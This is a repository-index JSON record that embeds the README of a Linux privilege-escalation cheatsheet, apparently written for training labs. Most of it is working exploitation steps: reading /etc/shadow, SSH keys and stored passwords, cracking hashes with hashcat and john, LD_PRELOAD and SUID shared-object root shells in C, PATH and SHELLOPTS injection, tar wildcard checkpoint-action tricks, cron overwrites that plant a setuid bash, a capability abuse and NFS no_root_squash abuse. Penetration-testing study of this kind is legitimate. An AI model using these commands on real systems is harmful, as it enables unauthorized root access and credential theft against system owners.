{"id":22804340,"url":"https://github.com/divinemonk/linux_privesc_cheatsheet","last_synced_at":"2025-07-09T18:15:38.973Z","repository":{"id":204012860,"uuid":"710914416","full_name":"Divinemonk/linux_privesc_cheatsheet","owner":"Divinemonk","description":"Linux Privilege Escalation: cheatsheet","archived":false,"fork":false,"pushed_at":"2023-10-27T18:07:55.000Z","size":201,"stargazers_count":3,"open_issues_count":0,"forks_count":1,"subscribers_count":2,"default_branch":"m41n","last_synced_at":"2025-04-13T19:49:49.184Z","etag":null,"topics":["cybersecurity","guide","hacking","linux","linux-privilege-escalation","privesc","privilege-escalation"],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Divinemonk.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2023-10-27T18:02:47.000Z","updated_at":"2024-04-24T01:56:20.000Z","dependencies_parsed_at":null,"dependency_job_id":"1c5764c4-ef0c-4dc3-8963-5c53ff0031c8","html_url":"https://github.com/Divinemonk/linux_privesc_cheatsheet","commit_stats":null,"previous_names":["divinemonk/linux_privesc_cheatsheet"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Divinemonk/linux_privesc_cheatsheet","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Divinemonk%2Flinux_privesc_cheatsheet","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Divinemonk%2Flinux_privesc_cheatsheet/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Divinemonk%2Flinux_privesc_cheatsheet/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Divinemonk%2Flinux_privesc_cheatsheet/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Divinemonk","download_url":"https://codeload.github.com/Divinemonk/linux_privesc_cheatsheet/tar.gz/refs/heads/m41n","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Divinemonk%2Flinux_privesc_cheatsheet/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264502358,"owners_count":23618579,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","guide","hacking","linux","linux-privilege-escalation","privesc","privilege-escalation"],"created_at":"2024-12-12T10:07:53.733Z","updated_at":"2025-07-09T18:15:38.914Z","avatar_url":"https://github.com/Divinemonk.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# _Linux Privilege Escalation_ cheatsheet\n\u003e get used programs/scripts (\u0026 more) in `/tools`\n\n\u003cbr\u003e\n\n## linux-privesc-suggestor\n- https://github.com/The-Z-Labs/linux-exploit-suggester\n- *detection*\n  - `./linux-exploit-suggester.sh`\n- *exploitation*\n  - `gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w`\n\n\n\u003cbr\u003e\n\n## openvpn config files\n- `cat /home/user/myvpn.ovpn`\n- `cat /etc/openvpn/auth.txt`\n- `cat /home/user/.irssi/config | grep -i passw`\n\n\n\u003cbr\u003e\n\n## bash history\n- `cat ~/.bash_history | grep -i passw`\n\n\n\u003cbr\u003e\n\n## weak file permissions\n- *detection*\n  - `ls -la /etc/shadow`\n- *exploitation*\n  - __target linux__\n    - save/copy these files\n      - `cat /etc/passwd`\n      - `cat /etc/passwd`\n  - __attacker linux__\n    - `unshadow \u003cPASSWORD-FILE\u003e \u003cSHADOW-FILE\u003e \u003e unshadowed.txt`\n    - `hashcat -m 1800 unshadowed.txt rockyou.txt -O`\n\n\n\u003cbr\u003e\n\n## ssh keys\n- *detection*\n  - `find / -name authorized_keys 2\u003e /dev/null`\n  - `find / -name id_rsa 2\u003e /dev/null`\n- *exploitation*\n  - __target linux__\n    - save/copy these files\n  - __attacker linux__\n    - `chmod 400 id_rsa`\n    - `ssh -i id_rsa root@\u003cip\u003e`\n\n\n\n\u003cbr\u003e\n\n## sudo \n\u003e *detection*\n  - `sudo -l`\n  - notice the list of programs that can run via sudo\n\n\u003e *exploitation*\n### shell escaping\n- https://gtfobins.github.io/\n\n### abusing intended functionality\n- __target linux__\n  - `sudo apache2 -f /etc/shadow` \n  - copy root hash\n- __attacker linux__\n  - `echo '[Pasted Root Hash]' \u003e hash.txt`\n  - `john --wordlist=/usr/share/wordlists/nmap.lst hash.txt`\n  - `john --show hash.txt`\n\n### LD_PRELOAD\n- notice that the LD_PRELOAD environment variable is intact\n- save following program as (suppose) `x.c`\n```\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdlib.h\u003e\n\nvoid _init() {\n    unsetenv(\"LD_PRELOAD\");\n    setgid(0);\n    setuid(0);\n    system(\"/bin/bash\");\n}\n```\n- `gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles`\n- `sudo LD_PRELOAD=/tmp/x.so apache2`\n\n\n\u003cbr\u003e\n\n## SUID \n### shared object injection\n- *detection*\n  - `find / -type f -perm -04000 -ls 2\u003e/dev/null`\n  - `strace /usr/local/bin/suid-so 2\u003e\u00261 | grep -i -E \"open|access|no such file\"`\n  - notice that `a.so` file is missing from a writable directory\n- *exploitation*\n  - `mkdir /home/user/.config`\n  - `cd /home/user/.config`\n  - save following program as `libcalc.c`\n```\n#include \u003cstdio.h\u003e\n#include \u003cstdlib.h\u003e\n\nstatic void inject() __attribute__((constructor));\n\nvoid inject() {\n    system(\"cp /bin/bash /tmp/bash \u0026\u0026 chmod +s /tmp/bash \u0026\u0026 /tmp/bash -p\");\n}\n```\n  - `gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c`\n  - `/usr/local/bin/suid-so`\n\n### symlinks\n- *detection*\n  - `dpkg -l | grep nginx`\n  - notice that the installed nginx version is below 1.6.2-5+deb8u3\n- *exploitation*\n  - __target linux 1__\n    - req. user = `www-data`\n      - simulate = `su root` \u003e `su -l www-data`\n    - https://github.com/xl7dev/Exploit/blob/master/Nginx/nginxed-root.sh\n      - `/home/user/tools/nginx/nginxed-root.sh /var/log/nginx/error.log`\n    - now the system waits for logrotate to execute\n  - __target linux 2__\n    - `invoke-rc.d nginx rotate \u003e/dev/null 2\u003e\u00261` as root\n  - __target linux 1__\n    - notice that the exploit continued its execution\n\n### environment variables\n- __type 1__\n  - *detection*\n    - `find / -type f -perm -04000 -ls 2\u003e/dev/null`\n    - make note of all the SUID binaries\n    - `strings /usr/local/bin/suid-env`\n    - notice the functions used by the binary\n  - *exploitation*\n    - `echo 'int main() { setgid(0); setuid(0); system(\"/bin/bash\"); return 0; }' \u003e /tmp/service.c`\n    - `gcc /tmp/service.c -o /tmp/service`\n    - `export PATH=/tmp:$PATH`\n    - `/usr/local/bin/suid-env`\n- __type 2__\n  - *detection*\n    - `find / -type f -perm -04000 -ls 2\u003e/dev/null`\n    - make note of all the SUID binaries\n    - `strings /usr/local/bin/suid-env2`\n    - notice the functions used by the binary\n  - *exploitation*\n    - __method 1__\n      - `function /usr/sbin/service() { cp /bin/bash /tmp \u0026\u0026 chmod +s /tmp/bash \u0026\u0026 /tmp/bash -p; }`\n      - `export -f /usr/sbin/service`\n      - `/usr/local/bin/suid-env2`\n    - __method 2__\n      - `env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp \u0026\u0026 chown root.root /tmp/bash \u0026\u0026 chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'`\n\n\n\u003cbr\u003e\n\n## capabilities\n- *detection*\n  - `getcap -r / 2\u003e/dev/null`\n  - notice the value of the “cap_setuid” capability\n- *exploitation*\n  - `/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system(\"/bin/bash\")'`\n\n## Cron \n### path\n- *detection*\n  - `cat /etc/crontab`\n  - notice the value of the “PATH” variable\n- *exploitation*\n  - `echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' \u003e /home/user/overwrite.sh` where `overwrite.sh` is file executed by cron\n  - `chmod +x /home/user/overwrite.sh`\n  - wait until the job runs to give root \u0026 then `/tmp/bash -p`\n\n### wildcards\n- *detection*\n  - `cat /etc/crontab`\n  - notice the script “/usr/local/bin/compress.sh”\n  - `cat /usr/local/bin/compress.sh`\n  - notice the wildcard (*) used by ‘tar’\n- *exploitation*\n  - `echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' \u003e /home/user/runme.sh`\n  - `touch /home/user/--checkpoint=1`\n  - `touch /home/user/--checkpoint-action=exec=sh\\ runme.sh`\n  - wait until the job runs to give root \u0026 then `/tmp/bash -p`\n\n### file overwrite\n- *detection*\n  - `cat /etc/crontab`\n  - notice the script “overwrite.sh”\n  - `ls -l /usr/local/bin/overwrite.sh`\n  - notice the file permissions\n- *exploitation*\n  - `echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' \u003e\u003e /usr/local/bin/overwrite.sh`\n  - wait until the job runs to give root \u0026 then `/tmp/bash -p`\n\n\n\u003cbr\u003e\n\n## NFS root squashing\n- *detection*\n  - `cat /etc/exports`\n  - notice that “no_root_squash” option is defined for the “/tmp” export\n- *exploitation*\n  - __attacker linux__\n    - `showmount -e \u003ctaget_linux_ip\u003e`\n    - `mkdir /tmp/1`\n    - `mount -o rw,vers=2 10.10.249.85:/tmp /tmp/1`\n    - `echo 'int main() { setgid(0); setuid(0); system(\"/bin/bash\"); return 0; }' \u003e /tmp/1/x.c`\n    - `gcc /tmp/1/x.c -o /tmp/1/x`\n    - `chmod +s /tmp/1/x`\n  - __target linux__\n    - `/tmp/x`\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdivinemonk%2Flinux_privesc_cheatsheet","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdivinemonk%2Flinux_privesc_cheatsheet","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdivinemonk%2Flinux_privesc_cheatsheet/lists"}